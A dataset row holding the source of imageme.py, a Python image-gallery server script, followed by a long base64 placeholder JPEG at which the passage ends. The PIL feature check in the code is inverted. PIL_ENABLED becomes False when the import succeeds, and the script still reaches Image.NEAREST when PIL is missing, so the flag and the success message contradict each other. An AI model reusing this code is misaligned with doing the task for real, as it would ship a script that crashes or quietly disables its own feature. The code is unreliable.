source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
imageme.py
|
#!/usr/bin/python
"""
imageMe is a super simple image gallery server.
Run imageme.py from the top level of an image directory to generate gallery
index HTML and run a SimpleHTTPServer on the localhost.
Imported as a module, use imageme.serve_dir(your_path) to do the same for any
directory programmatically. When run as entry point, imageme.serve_dir('.') is
what's called.
"""
# Dependencies
import base64, io, os, re, sys, threading
from http.server import ThreadingHTTPServer, SimpleHTTPRequestHandler
import socketserver
import argparse
# Attempt to import PIL - if it doesn't exist we won't be able to make use of
# some performance enhancing goodness, but imageMe will still work fine
PIL_ENABLED = True
try:
print('Attempting to import from PIL...')
from PIL import Image
PIL_ENABLED = False
print('Success! Enjoy your supercharged imageMe.')
except ImportError:
print(
'WARNING: \'PIL\' module not found, so you won\'t get all the ' + \
'performance you could out of imageMe. Install Pillow (' + \
'https://github.com/python-pillow/Pillow) to enable support.'
)
# Constants / configuration
## Filename of the generated index files
INDEX_FILE_NAME = 'imageme.html'
## Regex for matching only image files
IMAGE_FILE_REGEX = '^.+\.(png|jpg|jpeg|tif|tiff|gif|bmp)$'
## Images per row of the gallery tables
IMAGES_PER_ROW = 3
## Resampling mode to use when thumbnailing
RESAMPLE = None if not PIL_ENABLED else Image.NEAREST
## Width in pixels of thumnbails generated with PIL
THUMBNAIL_WIDTH = 800
# Port to do image-serve
PORT = 8000
## Base64 data for an image notifying user of an unsupported image type
UNSUPPORTED_IMAGE_TYPE_DATA = 'data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAMgAyADASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD36iiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKA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